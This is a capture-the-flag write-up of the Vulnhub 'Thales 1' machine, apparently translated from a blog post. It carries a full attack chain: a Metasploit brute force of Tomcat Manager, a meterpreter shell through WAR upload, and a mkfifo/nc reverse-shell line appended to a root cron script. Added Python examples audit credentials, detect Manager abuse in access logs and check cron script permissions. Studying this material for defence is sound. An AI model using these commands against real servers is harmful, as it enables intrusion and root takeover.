Thales 1
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Thales_1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:3e:7d:ac 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.128 08:00:27:3f:06:ce 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.128.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Thales_1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.128 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-10 23:46 EST
Nmap scan report for bogon (192.168.56.128)
Host is up (0.00087s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8c:19:ab:91:72:a5:71:d8:6d:75:1d:8f:65:df:e1:32 (RSA)
| 256 90:6e:a0:ee:d5:29:6c:b9:7b:05:db:c6:82:5c:19:bf (ECDSA)
|_ 256 54:4d:7b:e8:f9:7f:21:34:3e:ed:0f:d9:fe:93:bf:00 (ED25519)
8080/tcp open http Apache Tomcat 9.0.52
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.52
MAC Address: 08:00:27:3F:06:CE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
The NMAP scan shows that the target host has 2 open ports.
Getting a shell
Visiting port 8080 in a browser returns the default Tomcat page.
┌──(kali㉿kali)-[~/Vulnhub/Thales_1]
└─$ nikto -h http://192.168.56.128:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.128
+ Target Hostname: 192.168.56.128
+ Target Port: 8080
+ Start Time: 2022-12-10 23:49:55 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 8221 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2022-12-10 23:50:16 (GMT-5) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The manager and host-manager directories were found.
Visiting manager pops up a user authentication prompt (basic auth); visiting host-manager gives the same result. I tried a few weak passwords without success, so the Tomcat password brute-force module in Metasploit can be used:
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.128:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.56.128:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[+] 192.168.56.128:8080 - Login Successful: tomcat:role1
[-] 192.168.56.128:8080 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.56.128:8080 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.128:8080 - LOGIN FAILED: root:toor (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/tomcat_mgr_login) >
The username and password for /manager were cracked:
username: tomcat
password: role1
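The pair above is a stock entry from the default wordlist the Metasploit module uses, which is why the brute force took only a few seconds. The following Python script is an added example, not part of the original write-up: it audits a Tomcat tomcat-users.xml for accounts holding a manager-* or admin-* role whose password is one of the default pairs tried above, and checks whether the Manager application's context.xml restricts access with a RemoteAddrValve (Tomcat ships the Manager with such a valve limited to localhost). The XML samples are constructed, and the two extra default pairs (tomcat/tomcat, admin/admin) and the 12-character length policy are assumptions for the example.

```python
"""Audit Tomcat Manager credentials and access restrictions (added example).

Flags users in tomcat-users.xml that hold a manager-* or admin-* role and use
one of the default passwords tried by the Metasploit module above, and checks
whether the Manager's context.xml carries a RemoteAddrValve. Samples below are
constructed, not taken from the target.
"""
import xml.etree.ElementTree as ET

# (username, password) pairs seen in the tomcat_mgr_login output above, plus
# two more well-known defaults (assumption: tomcat/tomcat and admin/admin).
DEFAULT_CREDENTIALS = {
    ("tomcat", "admin"), ("tomcat", "manager"), ("tomcat", "role1"),
    ("manager", "admin"), ("root", "root"), ("root", "toor"),
    ("tomcat", "tomcat"), ("admin", "admin"),
}
PRIVILEGED_PREFIXES = ("manager-", "admin-")
MIN_PASSWORD_LENGTH = 12  # arbitrary policy threshold for this example

# Constructed tomcat-users.xml: one default account, one sane account, one
# unprivileged account that happens to use a weak password.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="role1" roles="manager-gui,manager-script"/>
  <user username="ops" password="Kc7#vLq9!pX2mZ" roles="manager-gui"/>
  <user username="reporter" password="admin" roles="viewer"/>
</tomcat-users>
"""

# Constructed Manager context.xml, first with no IP restriction, then with the
# localhost-only RemoteAddrValve that Tomcat ships in the Manager's META-INF.
SAMPLE_CONTEXT_OPEN = """<Context antiResourceLocking="false" privileged="true"/>"""
SAMPLE_CONTEXT_RESTRICTED = """<Context antiResourceLocking="false" privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\\.\\d+\\.\\d+\\.\\d+|::1|0:0:0:0:0:0:0:1"/>
</Context>
"""


def _local(tag):
    """Strip an XML namespace prefix: '{ns}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per privileged user with a default or short password.

    Digested passwords (CredentialHandler) never match the default list and
    are only subject to the length check, which a hex digest passes.
    """
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) != "user":
            continue
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password", "")
        roles = [r.strip() for r in elem.get("roles", "").split(",") if r.strip()]
        privileged = [r for r in roles if r.startswith(PRIVILEGED_PREFIXES)]
        if not privileged:
            continue  # unprivileged accounts cannot reach /manager
        if (name, password) in DEFAULT_CREDENTIALS:
            findings.append({"user": name, "roles": privileged, "reason": "default credential"})
        elif len(password) < MIN_PASSWORD_LENGTH:
            findings.append({"user": name, "roles": privileged, "reason": "short password"})
    return findings


def manager_restricted_by_ip(context_xml):
    """True if the Manager context has a RemoteAddrValve with an allow list."""
    for elem in ET.fromstring(context_xml).iter():
        if _local(elem.tag) != "Valve":
            continue
        if elem.get("className", "").endswith("RemoteAddrValve") and elem.get("allow"):
            return True
    return False


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print("WEAK:", f)
    print("open context restricted:", manager_restricted_by_ip(SAMPLE_CONTEXT_OPEN))
    print("hardened context restricted:", manager_restricted_by_ip(SAMPLE_CONTEXT_RESTRICTED))
```

Run against a real installation, the script would read $CATALINA_BASE/conf/tomcat-users.xml and webapps/manager/META-INF/context.xml; the unprivileged "reporter" account is deliberately skipped, because only accounts with Manager roles can reach the interface that the exploit below depends on.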
msf6 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > show options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java Universal
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/http/tomcat_mgr_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.56.128
RHOSTS => 192.168.56.128
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword role1
HttpPassword => role1
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying hX0h...
[*] Executing hX0h...
[*] Undeploying hX0h ...
[*] Sending stage (58829 bytes) to 192.168.56.128
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.128:54354) at 2022-12-11 00:22:20 -0500
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=999(tomcat) gid=999(tomcat) groups=999(tomcat)
At this point we have a shell on the target host.
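From the defender's side, both steps above (the brute force against /manager and the WAR upload through /manager/html/upload) leave a clear trace in Tomcat's access log. The Python snippet below is an added example, not code from the write-up: it parses lines in Tomcat's default AccessLogValve pattern (%h %l %u %t "%r" %s %b), flags a host that accumulates repeated 401 responses on /manager within a short window, the first authenticated /manager request from that same host afterwards, and any POST or PUT to the Manager's upload, deploy or undeploy endpoints. The log lines are constructed to mirror the Metasploit session shown above; the 60-second window and the threshold of 4 failures are arbitrary choices.

```python
"""Detect Tomcat Manager brute force and WAR deployment in the access log (added example).

Parses Tomcat's default AccessLogValve format (%h %l %u %t "%r" %s %b); the log
lines below are constructed to mirror the Metasploit session shown above.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager endpoints that create, replace or remove applications.
MANAGER_WRITE_PATHS = (
    "/manager/html/upload", "/manager/html/deploy", "/manager/html/undeploy",
    "/manager/text/deploy", "/manager/text/undeploy",
)

# Constructed log: four failed logins, the successful one, the WAR upload,
# the request that triggers the payload, the undeploy, and unrelated traffic.
SAMPLE_ACCESS_LOG = """\
192.168.56.206 - - [11/Dec/2022:00:20:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.206 - - [11/Dec/2022:00:20:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.206 - - [11/Dec/2022:00:20:02 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.206 - - [11/Dec/2022:00:20:02 -0500] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.206 - tomcat [11/Dec/2022:00:20:03 -0500] "GET /manager/html HTTP/1.1" 200 15817
192.168.56.206 - tomcat [11/Dec/2022:00:22:18 -0500] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABCD HTTP/1.1" 200 14021
192.168.56.206 - tomcat [11/Dec/2022:00:22:19 -0500] "GET /hX0h/ HTTP/1.1" 200 -
192.168.56.206 - tomcat [11/Dec/2022:00:22:20 -0500] "POST /manager/html/undeploy?path=/hX0h&org.apache.catalina.filters.CSRF_NONCE=ABCD HTTP/1.1" 200 14021
192.168.56.1 - - [11/Dec/2022:00:30:00 -0500] "GET / HTTP/1.1" 200 11156
192.168.56.1 - - [11/Dec/2022:00:30:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
"""


def parse_access_log(text):
    """Return one dict per line that matches the common log pattern."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines in another pattern rather than fail the run
        entries.append({
            "host": m["host"],
            "user": None if m["user"] == "-" else m["user"],
            "raw_time": m["time"],
            "time": datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"].split("?", 1)[0],  # drop the CSRF nonce / query string
            "status": int(m["status"]),
        })
    return entries


def _finding(kind, e):
    return {"kind": kind, "host": e["host"], "user": e["user"],
            "time": e["raw_time"], "path": e["path"]}


def detect_manager_abuse(entries, threshold=4, window=timedelta(seconds=60)):
    """Flag brute force against /manager, the login that follows it, and deployments."""
    findings = []
    recent_failures = defaultdict(list)   # host -> timestamps of 401s on /manager
    alerted = set()                       # (host, kind) already reported
    for e in entries:
        on_manager = e["path"].startswith("/manager")
        if on_manager and e["status"] == 401:
            fails = [t for t in recent_failures[e["host"]] if e["time"] - t <= window]
            fails.append(e["time"])
            recent_failures[e["host"]] = fails
            if len(fails) >= threshold and (e["host"], "bruteforce") not in alerted:
                alerted.add((e["host"], "bruteforce"))
                findings.append(_finding("manager-bruteforce", e))
        elif on_manager and e["status"] == 200 and e["user"]:
            if (e["host"], "bruteforce") in alerted and (e["host"], "login") not in alerted:
                alerted.add((e["host"], "login"))
                findings.append(_finding("manager-login-after-bruteforce", e))
        if e["path"] in MANAGER_WRITE_PATHS and e["method"] in ("POST", "PUT"):
            findings.append(_finding("manager-write", e))
    return findings


if __name__ == "__main__":
    for f in detect_manager_abuse(parse_access_log(SAMPLE_ACCESS_LOG)):
        print(f["kind"], f["host"], f["user"], f["time"], f["path"])
```

The single 401 from 192.168.56.1 stays below the threshold and is not reported; every write to the Manager is reported unconditionally, because a deployment that was not initiated by an administrator is worth a ticket regardless of how the credentials were obtained.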
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@miletus:/$ ls
ls
bin dev initrd.img lib64 mnt root snap sys var
boot etc initrd.img.old lost+found opt run srv tmp vmlinuz
cdrom home lib media proc sbin swap.img usr vmlinuz.old
tomcat@miletus:/$ cd /home
cd /home
tomcat@miletus:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Aug 15 2021 .
drwxr-xr-x 24 root root 4.0K Oct 14 2021 ..
drwxr-xr-x 6 thales thales 4.0K Oct 14 2021 thales
tomcat@miletus:/home$ cd thales
cd thales
tomcat@miletus:/home/thales$ ls -alh
ls -alh
total 52K
drwxr-xr-x 6 thales thales 4.0K Oct 14 2021 .
drwxr-xr-x 3 root root 4.0K Aug 15 2021 ..
-rw------- 1 thales thales 457 Oct 14 2021 .bash_history
-rw-r--r-- 1 thales thales 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 thales thales 3.7K Apr 4 2018 .bashrc
drwx------ 2 thales thales 4.0K Aug 15 2021 .cache
drwx------ 3 thales thales 4.0K Aug 15 2021 .gnupg
drwxrwxr-x 3 thales thales 4.0K Aug 15 2021 .local
-rw-r--r-- 1 root root 107 Oct 14 2021 notes.txt
-rw-r--r-- 1 thales thales 807 Apr 4 2018 .profile
-rw-r--r-- 1 root root 66 Aug 15 2021 .selected_editor
drwxrwxrwx 2 thales thales 4.0K Aug 16 2021 .ssh
-rw-r--r-- 1 thales thales 0 Oct 14 2021 .sudo_as_admin_successful
-rw------- 1 thales thales 33 Aug 15 2021 user.txt
tomcat@miletus:/home/thales$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
tomcat@miletus:/home/thales$ cat notes.txt
cat notes.txt
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.
tomcat@miletus:/home/thales$
Privilege escalation
From notes.txt we know there is a backup script, which is presumably run periodically:
tomcat@miletus:/home/thales$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 6666 >/tmp/f' >> /usr/local/bin/backup.sh
tomcat@miletus:/home/thales$
┌──(kali㉿kali)-[~/Vulnhub/Thales_1]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.128] 47602
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
3a1c85bebf8833b0ecae900fb8598b17
#
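The root cause of this escalation is a script that root runs from cron while a non-root user can modify it: the write-up does not show the crontab or the file's mode, but the append succeeds as the tomcat user and the callback arrives as root. The Python script below is an added example, not from the original post: it reads /etc/crontab or /etc/cron.d style entries, resolves the script each entry runs, and reports scripts that are group- or world-writable, not owned by the expected user, sitting in a world-writable directory without the sticky bit, or missing. demo() builds a constructed fixture in a temporary directory (a 0777 backup.sh, a 0755 script and a reference to a missing script) and audits a constructed crontab pointing at them; because the fixture is owned by the current user, demo() passes os.getuid() as the expected owner, where a real audit would keep the default of 0.

```python
"""Audit scripts run from cron for write access by other users (added example).

A script that root runs on a schedule is only as trustworthy as the set of
users who can modify it. This reads /etc/crontab or /etc/cron.d style lines,
finds the script each entry runs and checks its owner, mode and parent
directory. demo() builds a constructed fixture in a temporary directory.
"""
import os
import stat
import tempfile
import textwrap


def cron_script_paths(crontab_text):
    """Yield (user, absolute path) for each entry in system-crontab format."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if "=" in fields[0]:            # SHELL=/bin/sh, PATH=..., MAILTO=...
            continue
        if fields[0].startswith("@"):  # @reboot user command
            if len(fields) < 3:
                continue
            user, command = fields[1], fields[2:]
        else:                           # m h dom mon dow user command
            if len(fields) < 7:
                continue
            user, command = fields[5], fields[6:]
        for token in command:
            if token.startswith("/"):   # first absolute path is the script
                yield user, token
                break


def audit_script(path, expected_uid=0):
    """Return the reasons `path` is unsafe to run from cron (empty list if fine)."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing"]
    reasons = []
    if st.st_uid != expected_uid:
        reasons.append("owned by uid %d, not %d" % (st.st_uid, expected_uid))
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit")
    return reasons


def audit_crontab(crontab_text, expected_uid=0):
    """Audit every script referenced by the crontab; returns a list of findings."""
    findings = []
    for user, path in cron_script_paths(crontab_text):
        reasons = audit_script(path, expected_uid)
        if reasons:
            findings.append({"user": user, "path": path, "reasons": reasons})
    return findings


def demo():
    """Constructed fixture: a 0777 backup.sh (the Thales misconfiguration), a
    0755 script, and a missing script. The owner check uses the current uid
    because the fixture is not root-owned; on a real host keep the default 0."""
    workdir = tempfile.mkdtemp()
    bad = os.path.join(workdir, "backup.sh")
    good = os.path.join(workdir, "rotate.sh")
    for p in (bad, good):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\ntar czf /var/backups/home.tgz /home\n")
    os.chmod(bad, 0o777)   # anyone can append to a script root will execute
    os.chmod(good, 0o755)
    crontab = textwrap.dedent(f"""\
        SHELL=/bin/sh
        # m h dom mon dow user command
        */5 * * * * root {bad}
        0 3 * * * root {good} --quiet
        @reboot root /nonexistent/start.sh
    """)
    return audit_crontab(crontab, expected_uid=os.getuid())


if __name__ == "__main__":
    for f in demo():
        print("%s runs %s: %s" % (f["user"], f["path"], ", ".join(f["reasons"])))
```

The fix on the target side is the mirror image of each check: the script owned by root, mode 0755 or tighter, in a directory such as /usr/local/bin that only root can write to. A missing script is reported too, because an entry pointing at a path that does not exist becomes a hijack point as soon as someone can create the file.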
Tags: http, tomcat, Thales, 192.168, Vulnhub, 56.128, thales, target VM, root
From: https://www.cnblogs.com/jason-huawen/p/16973610.html